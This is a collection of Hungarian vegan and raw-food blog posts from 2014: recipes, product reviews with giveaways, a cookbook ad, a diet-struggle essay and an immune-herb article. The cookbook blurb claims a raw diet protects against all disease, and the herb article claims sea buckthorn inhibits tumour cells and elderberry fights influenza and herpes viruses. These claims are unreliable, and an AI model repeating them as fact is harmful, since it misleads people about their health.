erő kell hozzá! :-D túrós kakaós zabpalacsinta téli hangulató formában Megjegyzés1: Ha kedvünk úgy tartja, vonjuk be étcsokoládé-krémmel. 10 g zsírszegény kakaópor / karob por, pár ek. víz (mondjuk 5-6), tetszőleges édesítőszer, 1 teáskanál kókuszzsír. A fenti összetevők alacsony lángon összeforralandók, sűrűsödésig. Langyosan a palacsintákra kenjük. Dermedésig tartsuk hűtőben. Megjegyzés2: Az eredeti recept Fittipaldi gasztro blogger oldalról származik. Megjegyzés3: Ha valaki nagy kókusz rajongó, érdemes lenne kipróbálni kókuszreszelékkel a krémet, és a tejek helyett is konzerves kókusz tejet tenni bele.
Már tőlünk is rendelhető a Napeledel - Az Élő Ételek szakácskönyve
Imádom Joan könyvét! Változatos, sokszínű receptekkel és tudással van tele! Az egzotikus és hazai alapanyagok, ízek mind megtalálhatók benne, világos receptleírásokkal, mennyiségekkel, magyarázatokkal! Így, bár fotókkal nem bővelkedik, mégis minden kezdő és haladó nyers étel iránt érdeklődő jó társa lehet a konyhában! A spirálos kötésmegoldás kifejezetten praktikus. "Örök darab" a magyar nyersétel és egészséges étel irodalomban. Rendeld meg webáruházunkban! Ára: 3200 Ft Joan van Rooijen: Napeledel - Az Élő Ételek szakácskönyveJoan van Rooijen: Napeledel című receptkönyvem útmutatásként szolgál mindazok számára, akik természetes módon szeretnének táplálkozni. Aki forgatja és használja, megtudhatja belőle, hogy az Élő Ételek segítségével miként növelhetjük energiánkat és életerőnket, hogyan érhetjük el és tarthatjuk meg kalóriaszámlálgatás nélkül ideális testsúlyunkat. Nem kell félnünk az úgynevezett ,,jojó hatás-tói. A könyv segít megérteni, hogy nyers táplálkozással és tudatos életmód változtatással eredményesen védekezhetünk mindenfajta betegség ellen. Az új, sütés-főzés nélküli ételek színes, természetes és ínycsiklandozó megjelenésükkel és ízeikkel gyorsan megkedveltetik magukat. Hihetetlennek tűnik, de ismert ételeink legtöbbjét nyers, növényi eredetű alapanyagokból is sikerül megalkotnunk. Például mandulából tejet, túrót, sajtot és tejszínhabot. Kenyeret gabonacsírából, különféle zöldségekből. Táplálékunk ne legyen kisebb értékű, sütött-főzött, iparilag megdolgozott, hanem természetes eredetű, isteni nektár. ,,Ha egyszer már megkóstoltuk a nektárt, nem óhajtunk mást. 1943-ban Hollandiában születtem. Nővérképzésben vettem részt, főnővérként dolgoztam, fizioterápiát és kórházi menedzsmentet tanultam. 1988-ban mindenevőből vegetáriánus lettem és makrobiotikával foglalkoztam. Amszterdamban az lyengar Jóga Intézetben jógatanár diplomát szereztem. Gábriel Cousens ,,Conscious Eating könyvének olvasása nyomán ismerkedtem meg a nyers táplálkozással, az Élő Ételekhez kapcsolódó életstílussal. Saját konyhámban kísérleteztem, és külföldi éttermekben dolgoztam, így az évek alatt szerzett tapasztalataimmal sikerült egy nemzetközi jellegű Élő Étel konyhai stílust kialakítanom. Filozófiám szerint az Élő Étel, a jóga és a pránájáma együtt, egyedülálló egységben vannak egymással. Testünk és lelkünk harmóniáját segítik. Rendezettebbek, energikusabbak leszünk, könnyebben valósítjuk meg mindazt, amiben hiszünk. Egyszóval boldogok leszünk. - 240 oldal - Kötés: spirál - ISBN: 9789639831063
Táplálj helyesen édesanyám! (6. rész) + Kedvezménykupon
2014. szeptember 30. Zizi kalandjai
Többen kértétek, hogy adjak tippeket milyen ételeket érdemes vagy jó uzsonnára, snacknek pakolni egy majdnem másfél éves babának. Ádi most már szinte ugyanazokat eszi, amelyeket mi is fogyasztunk. Tízórait ritkábban eszik, mert később szokott reggelizni (nem egy koránkelő baba), azonban a délutáni alvás után mindig van egy- vagy többféle finomság, amit megkóstol. Ez függ attól is, hogy otthon vagyunk vagy éppen úton. Ha otthon vagyunk bármilyen étel szóba jöhet, mert minden a rendelkezésünkre áll: kanál, villa, tányér, asztal, stb. Ha úton vagyunk valahova, akkor érdemes olyat csomagolni, amely könnyen fogyasztható, kézzel/kanállal ehető, nem maszatol túlzottan, ráadásul finom és egészséges is. Néhány tipp, hogy nálunk mi a menő snack: - szezonális gyümölcsök: alma, narancs, banán, szőlő, avokádó - szezonális zöldségek: répa, sült sütőtök - vegán sajt kockákra vágva - natúr kölesgolyó - Alnatura teljeskiörlésű ropi - almás zab palacsinta - banános palacsinta - cukormentes tripla szezámos keksz Az almát szereti egészben is enni, de vághatjuk szeletekre, kockákra, ha még nehezebben rág a baba. A narancsot többnyire megpucolva, gerezdekre szedve csomagolom el. A banánt és szőlőt önállóan eszi Ádi, az avokádót pedig vihetjük félbe vágva, folpackba csomagolva és kanállal eszi meg a húsát a baba. Ádi a répát simán elrágcsálja, a sült sütőtök pedig szintén kanállal ehető. A vegán sajthoz jól passzol a natúr kölesgolyó vagy a ropi (amely egyébként cukormentes is!). Persze mindez az őszi szezonhoz igazodik, ha nyár lenne, nyilván mást pakolnék uzsonnára. Ami az innivalót tekinti, többnyire vizet vagy almalevet viszünk magunkkal. Szeretem vidám, környezetbarát dolgokba csomagolni az uzsonnát. Beszerezés alatt vannak rozsdamentes acél dobozkák, amelyekbe sok minden tehető. Fontosnak tartom, hogy ha műanyag dolgot használok, akkor azok BPA és PVC mentesek legyenek (erről bővebben írtam itt). A Skip*Hop Magyarországtól lehetőséget kaptunk újabb termékek tesztelésére, olyan termékekére, amelyek az uzsonnáztatást teszik színesebbé, vidámabbá. Uzsonnás táskájuk 13 féle színben (állat formában) kapható. A kis ételtároló táska belseje hőszigetelt, frissen tartja a benne tárolt ételt. Tágas egyterű rekeszében praktikusan helyezhető el a szendvics, gyümölcs, snack vagy ital stb. Belső hálós zsebében evőeszköz, szalvéta is tárolható, ezenkívül beleírhatjuk a gyermekünk nevét. Könnyen tisztítható, nedves ruhával letörölhető, lemosható. Hátizsákként nem használható, csak kézben fogható vagy felakasztható (pl: a babakocsira). A kulacsaik (11 féle színben kapható) BPA-mentesek, ftalát-mentesek, és PVC-mentesek. Minden kulacsban szívószál található, amelyet flip-top kupak véd, így a kulacs nem csöpög. Az üveg és a szívószál is könnyen tisztítható, mosogatógépben mosható. Tartozik hozzá egy extra, pót szívószál is. Ádi nagyon szépen iszik már pohárból, palackból is, de a szívószállal még csak ismerkedik. Tetszik neki, ha buborékot fújok vele a kulacsba vagy a pohárba, tanítom a használatára, de egyelőre még nem a rendeltetésének megfelelően használja. Mindkét termék elnyerte a tetszésünket. Ádi uzsonnáját sokszor a táskámba tettem bele, külön volt minden, a cumisüvegtől kezdve a kis dobozkákig. Az uzsonnás táska maximálisan ki van használva, mindent egy helyre tudok tenni, Ádi pedig imádja hordozgatni, kinyitni, ki- és bepakolni belőle mindent. A kulaccsal pedig egyelőre ismerkedünk, biztos vagyok benne, hogy hamarosan menni fog a szívószállal való ivás. Anya magyaráz, Ádi koncentrál A Skip*Hop elérhető az alábbi linkeken: - weboldal - Facebook oldal Skip*Hop Magyarország és Monkie Az uzsonnás táskát és a kulacsot a {Monkie} biztosította a teszteléshez. A véleményem csakis a sajátom. ***** KEDVEZMÉNYES VÁSÁRLÁSI LEHETŐSÉG A ZIZI KALANDJAI OLVASÓINAK!!! Aki 2014. szeptember 29 és 2014. október 10-e között vásárol Skip Hop, Yeominis, Stor it vagy Frank&Fischer márkájú termékeket a Monkie oldaláról az 10% kedvezményben részesül (a végösszegből kerül levonásra). A kuponkód, amelyet megrendeléskor be kell írni a kedvezmény érvényesítéséhez: ZIZI10. Jó vásárlást mindenkinek!
Természetesen szeretem ...
2014. szeptember 29. Nyers konyha
Krémek krémje! Aki a tudatosság útjára lép és elkezd ennek megfelelően élni, táplálkozni, előbb vagy utóbb eljut oda, hogy a kozmetikumok közül is a tiszta, természetes összetételűt keresi. Találtam néhány hónapja egy magyar krémet, amit szeretnék bemutatni, mert nekem bevállt. A bőröm alpvetően száraz, igényli a hidratálást. Régebben délben még egyszer meg kellett ismételnem arcom krémezését, mert feszült, száraz volt. Ez a krém estig kitart, nem kell magammal cipelni mindenhova. Reggel elég gyűrött tud lenni az ember, hát én is, de ahogy felkenem a krémet, már látványosan kezd kisimulni az arcom. Sminkelni csak minimálisan szoktam, kis szempillaspirál, pirosító. Korábban sokszor lefolyt, elkenődött a szemem alatt a festék. Ez a krém is tartalmaz, olajat, növényi zsírt, de azonnal felszívódik, nem hagy sem zsíros érzést, sem nyomot maga után. Az első doboz arckrémem 2 hónapig is kitartott, mert nagyon kevés elég belőle. Csupa növényi finomság van benne, mondhatni vegán termék, állatokon nem tesztelik. Méh viaszt viszont tartalmaz 1-2 krém. Van szérumuk bőrfiatalításra, szintén csak ajánlani tudom, én is használom, és van dezodorjuk is, ami nálam függőséget okozott ! :) Ja és még egy érdekes dolog, az arckrémekhez, étrend- kiegészítőket is lehet venni, mert a cég tisztában van vele, hogy a szép bőr a táplálkozással kezdődik! http://www.wisetreenaturals.hu/index.php/hu/
Dilemma - KELL EZ NEKEM??
2014. szeptember 24. Sose mondd, hogy soha
Lelkesedés ezerrel, büszkeség, élvezet. Aztán puff. 10 tiszta gyümölcsevő nap után nyakamba szakadt a vasárnap. Hosszú, sűrű nap volt, csupa jó program, de túl sok... és még messze nem volt vége, amikor elérkezett a vegán aktivista tali ideje. A Kozmoszban tartottuk, ami a város legjobb vegán étterme. Nem rontottam el a tökéletes félévet, nem ettem semmi olyat, ami nem volt nyers. De szenvedtem. Nem kicsit. Önkínzásnak éltem meg azt, hogy ragaszkodom az elhatározásomhoz. Nem hiszem, hogy ez így jó. Ami valójában lelkileg fájt az ez: nem tudok együtt enni a barátaimmal. 3 és fél éve, amikor vegán lettem, szinte teljesen egyedül voltam. Két vegánt ismertem csak. Mostanra van legalább 50-60 vegán haver, akikkel együtt terjesztjük az együttérző életmódot. Velük ülök együtt és mégsem tudok velük együtt enni. Egyedül érzem magam, kilógok... Nem ezt akartam. Másnap délben úgy mentem el a melóhelyem melletti falafeles előtt, hogy átmentem a túloldalra, hogy ne érezzem az illatokat. Tele volt az agyam a Kozmoszban megtapasztalt illatokkal és képekkel. Felizgatva éreztem magam - nem úgy. Hanem úgy agyilag, kajailag. Nem volt jó érzés. Ráadásul volt két lukasórám, így még időm is akadt, hogy falafelezzek. Ültem a szobában, pötyögtem a gépnél és erősen próbáltam nem kimenni. Erre bejön Dani és még meg se szólal, csak odahajol puszit adni, már érzem a száján... Szeráj... Kész, ez volt az utolsó csepp. Teljesen egyedül vagyok. Semmi értelme az egésznek. Megyek és eszem egy falafelt. És mentem és ettem egy falafelt. B@ssza meg... Nem tudom, fog-e ez menni nekem. Nem tudom, akarom-e, hogy menjen. Etikai vegánnak indultam. Állatvédőnek, aki azt hirdeti, hogy nem kell lemondani semmiről, csak helyettesíteni kell növényi alapúval. Legyen bár olaszos, kínai, magyaros, franciás, bármilyenes kaja, mindent meg lehet csinálni vegánul és finom és szinte észre sem veszed a különbséget. Viszont egészségesebb. Vegánnak lenni élvezet! Mindez így igaz. Továbbra is ezt reklámozom. De közben nem ezt élem. A barátaim néhány kivétellel most is eszerint élnek és jól vannak. S nekem most is az állatvédelem a legfontosabb. Miért csinálom ezt az egész önkínzást? Szeretném visszakapni a régi életem egyszerűségét. A heti egy bevásárlást a szupermarketben, a házi hot dogot, a tésztás kajákat, a tofut, a reggeli lekváros pirítóst, a szendvicseket és persze az együtt evést, az összetartozást. Nem kényszerít senki. Nekem kell döntenem. Hetek óta Don Bennett könyveit olvasom (gyümölcsevő 20 éve) és lenyűgöz a belőlük áradó józan ész, logika, humor, egyszerűség. Imádom a pasit és elhiszem neki, amiket ír. Hogy élhetnék úgy, mintha nem olvastam volna? Dani szerint egyszerű (mint minden...). A mindennapokban eszem, ahogy helyesnek tartom és közösségi eseményeken eszem együtt a többiekkel a főtt vegán kajákat. No problem. De nekem problem. Identitás problem. hogy akarok élni, mit akarok mutatni, hirdetni? Ma meghívtak az rtl egyik műsorába beszélni a vegán életmódról. Mit válaszolok, ha megkérdezik, mit szoktam enni egy nap? Állatvédelmileg is a gyümölcsevő életmód lenne a legjobb, hiszen hosszú távon az egészséges népesség valóban nem fog állatokon kísérletezni. Amíg vannak betegek, ez lesz az utolsó állatkínzás, amit még meg fognak tartani. De nem állhatok oda egy totál vegyes táplálkozású ember elé azzal, hogy egyen reggelire zöld turmixot, ebédre banánt, datolyát, aztán zárjon este egy akkora zöld salátával, ami egy 4 tagú családnak is kihívás lenne... ...vagy mégis? Nem akarok visszafordulni. De nem tudom, merre van előre.
5+1 legismertebb immunerősítő gyógynövény
2014. szeptember 16. Éltető ételek
Szép hazánkban számos olyan gyógynövény van, melyekről régóta ismert, hogy erősíti az immunrendszert. Nézzünk néhányat, mely mindenki számára könnyen hozzáférhető. 1. Homoktövis A homoktövis ,,titka a benne lévő, legalább 190 biológiailag aktív anyag szinergenciája, vagyis egymást erősítő hatása. Gyönyörű narancssárga termése számos vitamint tartalmaz (B1-, B2-, B6-, B8-, B9-, K-, P-, PP- és E), ezen kívül karotinoidokat, ásványianyagokat (vas, magnézium), mikroelemeket, flavonoidokat. Természetes C-vitamin utánpótlást biztosít a szervezetnek (tízszerese a citrom C-vitamin tartalmának). Kiemelkedő antioxidáns tartalmának köszönhetően gátolja a daganatos sejtek képződését, védi és erősíti az immunrendszert, késleltei az öregedési folyamatokat . Hozzájárul a szív- és érrendszer, valamint az emésztés megfelelő működéséhez. A homoktövist úgy önmagában is ehetjük, vagy nyers édességek alapja is lehet. Főzhetünk belőle teát, vagy a nyers húsából készült őrlemény bármilyen kása vagy müzli alapanyaga lehet. 1. Hagymafélék Nemrég írtam egy bejegyzést a gyógyító hagymákról, melyek - többek között - remek immunerősítők is. Legjobb nyersen fogyasztani, de kiváló hagymatea is készíthető belőle, mely meghűléses megbetegedéskor jó szolgálatot tesz . A fokhagymát szerintem senkinek nem kell bemutatnom. Természetes antibiotikum, vírusok, paraziták, baktériumok ellen is bevethető. Antioxidáns hatású, pl. a mézes fokhagyma kiváló immunerősítő a téli időszakban. Értágító hatása van, és a nehézfémek kivezetésében is segítségünkre lehet. A medvehagyma a fokhagyma erdei testvére, így gyógyhatásuk is hasonló. Alkoholos kivonata immunerősítésre (is) bevethető. Törekedjünk arra, hogy tavasszal minél több medvehagyma kerüljön a tányérunkra. 3. Csipkebogyó A csipkebogyóról szerintem mindenkinek a magas C-vitamin tartalom jut eszébe. Milyen érdekes, hogy a téli hónapokban is ad a természet nekünk immunerősítésre használható gyógynövényt. (A homoktövis is gyűjthető télen.) A C vitamin természetes antioxidáns, mely részt vesz a sejtképzésben, segíti a vas felszívódását, gyorsítja a kötőszövet újraépülését. 100 gramm csipkebogyóban több mint 200 mg C vitamin van , míg ugyanennyi citrusféle csak 40-50 mg-ot tartalmaz. De tartalmaz még B-, K-, és P (rutin) vitamint is. Ezenkívül ásványi anyagokban, karotinoidokban, pektinben, fenolokban is gazdag. Mivel a C vitamin hőre érzékeny, ezért a tea készítése során hideg áztatásra van szükség. Én úgy szoktam készíteni, hogy este, lefekvés előtt 1 teáskanál csipkehúsra ráöntök 2,5 dl vizet, és reggelig állni hagyom. Reggel leszűröm a teát, majd újabb 2 dl vízzel főzöm (3-5 percig), majd állni hagyom 10 percig. Így a többi hatóanyag is ki tud oldódni. A két teát összeöntöm, és ihatom is. Ezáltal nemcsak a C vitamin tartalom fog hasznosulni, hanem az egyéb pl. ásványianyag tartalom is. Mit készíthetünk még a csipkebogyóból? - Csipkebogyós méz : tegyünk egy üvegbe csipkehúst (kisebb darabokba, vagy szárítva, őrölve), és öntsük fel mézzel. A méz ozmotikus hatása kivonja a hatóanyagokat, és egy csodás gyógymézet kapunk. A méz mindenképp termelői legyen az élettani hatása miatt. - A csipkebogyót a zöld turmixunkba is beletehetjük. - Szárított, darabolt csipkehúst kevés tisztított vízbe áztassuk be 1 éjszakára. Majd másnap botmixer neki, és kész is a nyers lekvár , amiben minden benne van a maga természetes formájában. Pár nap alatt fogyasszuk el! - Csipkelekvár: főzzük 5-10 percig a darált csipkehúst, majd tegyük fertőtlenített üvegbe. Lehetséges, hogy a C vitamin tartalma sérül, de egyéb más hatóanyagai benne maradnak. Fogyasztás előtt szükség szerint mézzel ízesíthető. 4. Bodza A bodza szó hallatán szerintem sok embernek csak a bodzaszörp jut eszébe. Nos, a bodza ennél több. A népi gyógyászatban nemcsak a virága, hanem a bogyója is kiemelkedő a meghűléses betegségek kezelése során. Vigyázat! Ne keverjük össze a gyalogbodzával, mely bogyója mérgező. (A gyalogbodza lágyszárú, termése éretten felfele néz, tehát NEM csüngő.) A virága és alkoholos kivonata a hárshoz hasonlóan izzasztó, lázcsillapító, nyákoldó, immunstimuláns hatású. A virágából teát készíthetünk, mely teakeverékekben még hatásosabb. A terméséből akár lekvárt is főzhetünk (nyersen hashajtó hatású). Szakirodalmi adatok alapján a bodzabogyó antioxidánsokban, flavonoidokban rendkívül gazdag . Az ásványi anyagok közül említésre méltó magas kálium tartalma, valamint sok C-, A- és E vitamint is tartalmaz. Hatékony számos influenza vírus törzzsel szemben is, valamint nemcsak a különféle influenza vírusok hatását gyengíti, gátolja, hanem többféle herpesz vírusra is hasonló módon hat. Nemhiába került bele a bodzabogyó kivonat a manó mannába és a Vadon gyöngyébe is. Szuper koncentrátuma remek immunerősítő. 1. Hárs A hársfát szerintem mindenki ismeri. Viszont a gyűjtésnél mindenképp oda kell figyelni, mivel orvosi célokra csak a kislevelű-, nagylevelű- és a széleslevelű hársfák virágai használhatók fel. Az ezüst- és a molyhos levelű hárs virágai drogként nem gyűjthetők. A virágok felejthetetlen illata és a méhek döngicsélése a nyár közeledtét jelzi. A virág legfontosabb hatóanyagai a flavonoidok, nyálka, szaponin, cseranyag, illóolaj. Ebből adódik, hogy remek köptető, nyákoldó, lázcsillapító hatása van, de mindezek mellett is bír. A hársméz gyógyhatásai is bevethetők a téli időszakban. Viszont minden esetben termelői, hőkezeletlen mézet fogyasszunk. A bodzával 1:1 arányban készített teája kedvelt izzasztószer. Immunerősítés céljából fogyasztását csak kúraszerűen javaslom (1 hét fogyasztás után 1-2 hét szünet). 5+1 Kakukkfű A téli hónapok elengedhetetlen immunerősítője, évszázadokon keresztül a szegények antibiotikuma volt. A kakukkfű legfőbb hatóanyaga az illóolaj. Erős immunerősítő hatással bír, légúti betegségek esetén elsőként gondoljunk a kakukkfűre. Ihatunk teát, alkoholos tinktúrát, de illóolajos-mézes köptetőt is készíthetünk. Nagyon jó összetevője a mellkasi bedörzsölőnek, a gyerekek téli immunerősítésére heti 1 alkalommal kakukkfüves fürdőt is készíthetünk. Kiváló fűszernövény is, így ételeinkbe rendszeresen belefőzhetjük. A folytásban még olvashattok 5+1 kevésbé ismert, de ugyanolyan hasznos gyógynövényről.
Vegán vagány humuszos szendvics + Nyereményjáték
2014. szeptember 10. Zizi kalandjai
Sokszor van, hogy apukám megkérdezi tőlem: “Nagyon sok zöldséget, gyümölcsöt eszünk, néha azért egy kis húst is, de vacsoránál mit kellene a kenyérre tennünk felvágott és kolbász helyett?” Olyat kell mutatnom, amit gyorsan és egyszerűen el tudnak készíteni, mert ha macerás, akkor kisebb az esélye, hogy bárki nekikezdene… ugye? Humuszt csináltam már itthon néhányszor – talán éltemben először ezt a bazsalikomosat – és készültem is megosztani a receptjét, de eddig elmaradt. Most újra elkészítettem, hogy le is tudjam fotózni és tényleg annyira, de annyira finom lett, hogy mindenki megnyalta az ujjait utána, aki evett belőle. Nagyon könnyű megcsinálni, tényleg, egy jó botmixer vagy robotgép kell hozzá. Az eredeti humusz szárított csicseriborsóból készül, amit órákig áztatunk, aztán megfőzünk, majd ezután dolgozzuk fel, de én az idő rövidsége miatt konzerv csicseriborsót használtam. Igen, őszinte leszek, használok konzervet (legtöbbször babot, csicseriborsót és hámozott paradicsomot) az idő szűke miatt, de csakis jó minőségűt, amelyekben nincsen semmi felesleges, oda nem illő anyag! Aztán ez a finom humusz kenyérszeletekre került, adtam hozzá még néhány dolgot és lett belőle egy vagány szendvics. Persze a humuszt bárhogyan felhasználhatjátok, ízléseteknek megfelelően pakoljátok egymásra a finomságokat a szendvicsben, becsomagoljátok zsírpapírba, átkötitek madzaggal, hogy igazán rusztikus legyen. Majd beleteszitek egy vidám, színes uzsonnás táskába, olyanba, amit öröm lesz kinyitni. Tesztek mellé egy almát, esetleg valamilyen kekszet és egy üveg vizet. Azt hiszem, aki egy ilyennel megy a munkahelyére, irigyelni fogják a kollégái, vagy, aki egy ilyennel indítja útjára gyermekét iskolába, tuti, hogy megkörnyékezik majd az osztálytársak, hogy elcseréljék a saját uzsijukat egy ilyen vagányra. A Picibutik – Anita és Andrea álma – kreatívan használható termékeket hoz létre, és részese szeretne lenni egy környezettudatosabb életmódnak. Vidám, strapabíró uzsonnás táskáik élelmiszerbarát PVC anyagból készülnek, belül letörölhetőek és moshatóak is. Megtartják az élelmiszerek frissességét, cseppmentesen biztosítják a környezetüket. Nagyon sokszor felhasználhatóak és mindhárom méret praktikusan alkalmazható. A legnagyobba a szendvicseken túl a kulacs is belefér (én egy 700 ml-eset tettem bele és simán le lehetett zárni), de vitték már pelenkatartó táskának és ebédhordó dobozoknak. A középső méret egy szendvicsnek vagy neszeszernek is kiváló. A legkisebb kekszek, magok tárolására kiváló, de iratokat is tehetünk bele. A Picibutikkal és termékeikkel találkozhattok a Meskán, illetve 2014. szeptember 13-án lesz az Erzsébet téren (Design Terimál mentén) a Piacok napja című rendezvény, amin a WAMP is részt vesz, s így általuk a Picibutik is kiállít. A rendezvény érdekessége, hogy a design vásárokat, garázsvásárokat és kicsi és nagy kézművesvásárokat népszerűsíti, ahol a társadalmi és környezeti fenntarthatóság tevékenységük célja. Humusz Hozzávalók: - 2 db konzerv csicseriborsó (240 g nettó súly/konzerv), leszűrve, átmosva - 3 evőkanál tahini - 2 gerezd fokhagyma - 1 db nagy citrom kifacsart leve - só, bors - víz - pirospaprika, olívaolaj a tálaláshoz Tegyük a csicseriborsót, tahinit, fokhagymát, citromlevet, sót, borsot a robotgépbe és kezdjük el pürésíteni. Evőkanalanként adagoljunk hozzá vizet, hogy teljesen sima krémet kapjunk. Tálaláskor locsoljuk meg egy kevés olívaolajjal és szórjuk meg pirospaprikával. Dobozba téve, hűtőben eláll egy hétig. Vegán vagány humuszos szendvics Hozzávalók 2 szendvicshez: - 4 szelet pirított kenyér - humusz - 1 paradicsom, vékony szeletekre vágva - 1/2 avokádó, meghámozva, szeletekre vágva - egy kisebb darab uborka, vékony szeletekre vágva - egy kevés frissen facsart citromlé - só, bors A megpirított kenyérszeleteket kenjük meg humusszal. Az egyik szelet kenyérre tegyünk uborka, majd paradicsom szeleteket, a másik szeletre pedig avokádót – erre az oldalra csepegtessünk néhány csepp citromlevet, sózzuk, borsozzuk, majd a megpakolt kenyérszeleteket borítsuk össze. ***** A Picibutik elérhető az alábbi linkeken: - Meska - Facebook oldal Az uzsonnás táskákat a Picibutik biztosította a teszteléshez. A véleményem csakis a sajátom. ***** NYEREMÉNYJÁTÉK! Nyeremény : egy darab kivis szendvics tartó. Menjetek fel a Picibutik Meska oldalára és írjátok meg ide a bejegyzés alá kommentben, hogy nektek melyik mintájú és nagyságú (tízórai, szendvics vagy ebéd – lunch -) táska/tartó tetszik a legjobban. Kérem, hogy az alábbi formula minden pontját töltsétek ki (kommentelés, Picibutik Facebook like)! Vagyis a számok (+5, +10) melletti lefelé mutató nyilakkal nyissátok meg az ablakokat és hajtsátok végre az apró feladatokat. a Rafflecopter giveaway Szabályok : 2014. szeptember 14-ig lehet játszani. Eredményhirdetés 2014. szeptember 15-én! A nyertest emailben fogom értesíteni, majd a neve kikerül a blogra (ez a bejegyzés fog frissülni). A nyertes a szendvicstartót személyesen veheti át Budapesten vagy magyarországi címre postázom.
Életmódváltás a konyha szekrényben: avagy milyen hozzávalókra lesz szükségem az egészségesebb élethez?
2014. szeptember 9. Zöld Avocado
Úgy érzem kell egy kis kiegészítés a receptekhez, úgy általában. :-) Tartok attól, hogy sokan megijednek majd a hosszú hozzávaló listáktól, vagy az ismeretlen super food-ok neveitől. Mivel ez egy nem hagyományos, húsos, magyar konyha recepteket tartalmazó gasztro blog, ezért az biztos, hogy az elején sok újdonságot fogtok olvasni, és olyan hozzávalókkal fogtok találkozni, ami nincs otthon a konyhátokban, sőt, azt sem tudjátok hol lehet őket beszerezni? ;-) desszert hozzávalók újratöltve Ne futamodjatok meg! Az egészséges ételek nem bonyolultak, csak egy kis életmód váltásra, szemlélet váltásra van hozzájuk szükség! Például mikor legközelebb a kedvenc hiper/szuper marketetekbe mentek vásárolni, nézzetek szét olyan polcokon és részlegeken is, ahol eddig még nem jártatok. Rengeteg érdekes és új étellel fogtok találkozni. Sokan azt hiszik, hogy az a rész a boltban, ahol a gluténmentes, és cukormentes termékek vannak, azok csak a beteg, ételallergiás emberek számára vásárolhatóak. :-) Tévedés! A gluténmentes, vagy cukormentes alapanyagok az egészséges emberek számára is egészségesek! ;-) Bátran vásároljatok cukormentes kekszeket, vagy gluténmentes tésztát a legközelebbi túrós csuszához! Nem kell megvárni, míg tényleg muszáj lesz ilyen termékeket fogyasztani. gesztenye szív Előzzük meg a betegségeket, és ne pedig kezeljük őket! A Világ rengeteg országában (főleg az ázsia országokban) nem az a jellemző, hogy megvárják az emberek, míg betegek lesznek, és aztán betegségek tüneteit gyógyszerekkel kezelik, hanem ellenkezőleg! Már előtte tesznek azért, hogy ne legyenek betegek! Megelőznek, és nem pedig tüneteket kezelnek! A testi betegségek megelőzésének pedig az egyik legfontosabb eszköze, a helyes táplálkozás! Olyan ételek elfogyasztása, amit a szervezetünk könnyedén megemészt, tele van ásványi anyagokkal, vitaminokkal, enzimekkel, hasznos baktériumokkal, könnyen felszívódó zsírokkal, szénhidráttal, és növényi fehérjével. Az ilyen ételektől energia dúsabb, mosolygósabb, könnyedebb életet élhetünk gyógyszerek fogyasztása nélkül, ideális testsúllyal! :-) Nem kell szigorú diétákat követni, vagy magunkat sanyargatni, csak lecserélni a már megszokott alapanyagokat, egészséges, 100%-ban hasznosítható, természetes alapanyagokra a konyhában. :-) diófélék És akkor a teljesség igény nélkül néhány hozzávaló, amivel biztosan találkozni fogsz a receptjeimben. Valószínűleg még nincs a konyha szekrényedben, de érdemes lenne beszerezni őket! ;-) - GMO (gén módosítás) mentes tofu - super food: kendermag, chia mag, goji bogyó, búzafű, - sörélesztő pehely, útifűmaghéj (Psylium Husk) - sós magok: napraforgómag, tökmag, fenyőmag, lenmag, szezámmag - diófélék: dió, brazil dió, pekán dió, mogyoró, kesu dió, mandula - aszalt gyümölcsök - kókusz zsír, extra szűz olíva olaj, szezám olaj - szódabikarbóna - Agave szirup, Demerara cukor, Xilit, kókusz reszelék - teljes kirölésű tönköly liszt, rizs liszt, mandula liszt, kukorica liszt - kókusz tej, rizs tej, mandula tej - rengeteg avokádó, cukkini és lila hagyma - csicseriborsó - gabonák: amaranth, quinoa, hajdina, köles, kuszkusz, bulgur, zab - friss cserepes bazsalikom és petrezselyem - Himalája só, egész fekete bors - lehetőleg organikus körülmények között termesztett zöldségek, gyümölcsök, tojások - stb. Qunioa (gabona) Ráadásul szépen lassan, ahogy átszokunk az olyan ételek fogyasztására, melyek nagy részét meg tudjuk emészteni, tudjuk hasznosítani, azaz "tüzelő anyagként szolgál", és nem pedig csak tömjük magunkba, és raktározzuk, mint a gyors kaják nagy részét; annál inkább észre fogjuk venni, hogy egyre kisebb mennyiség is elég, ahhoz, hogy jól lakjunk. Most pedig azt gondoljátok, hogy egy marék salátával éhesek maradtok, úgyhogy, amiket írok, az baromság. Igen,én is így gondoltam korábban, mikor még a marék saláta csak tányér dísz volt a rántott hús és krumpli mellett. :-) De ma már nem így gondolom, és ma már a testem sem így gondolja! Kezd el! Próbáld ki! Változtass, és beszélgessünk róla egy fél év múlva! ;-) aszalt gyümölcsök, diófélék Van jó pár konyhai gép, ami megkönnyítheti a munkánkat, és segíthet, hogy még természetesebb módon jussunk hozzá az alapanyagjainkhoz. Ezek nagy része még nekem sincs meg, de már rajt van a kívánság listámon! ;-) Ilyen konyhatündér például az aszaló gép, a kenyér sütő gép, a száraztészta készítő és a csíráztató gép. Ezek nélkül is lehet élni, és létezni egy vegetáriánus konyhában, de előbb utóbb érdemes beruházni rájuk. Ami viszont elengedhetetlen már a kezdetektől fogva: mák/kávé daráló, turmix gép, kézi tumix, vagy mindez egyben egy multifunkciós gépben a legjobb. Ez itt nem a reklám helye, de nekem ő a társam minden nap a konyhában, és teljes mértékben meg vagyok elégedve vele, és az ára is lenyűgőzően alacsony. Ez egy Andrew James multifunkciós készülék, ami darál, őröl, darabol, pépet készít, turmixol, gyümölcs levet présel, dzsúzt készít, és mindig minden percben a kezem alá dolgozik. :-) Az amazon-on már 30 euróért (közel 10ezer Ft) hozzá lehet jutni. Szerintem ez nem drága egy ilyen kis mindenttudóért. ;-) Nem túl nagy teljesítményű, de egy átlagos háziasszony konyhájában bőven elég, amire képes. Azt hiszem ennyi, amit így előljáróban érdemes tudni és beszerezni a receptek elkészítéséhez. Örömteli, és egészséges gasztro alkotást kívánok mindenkinek! Táplálkozz, ne csak étkezz! ;-)
Málnás jégkrémtorta
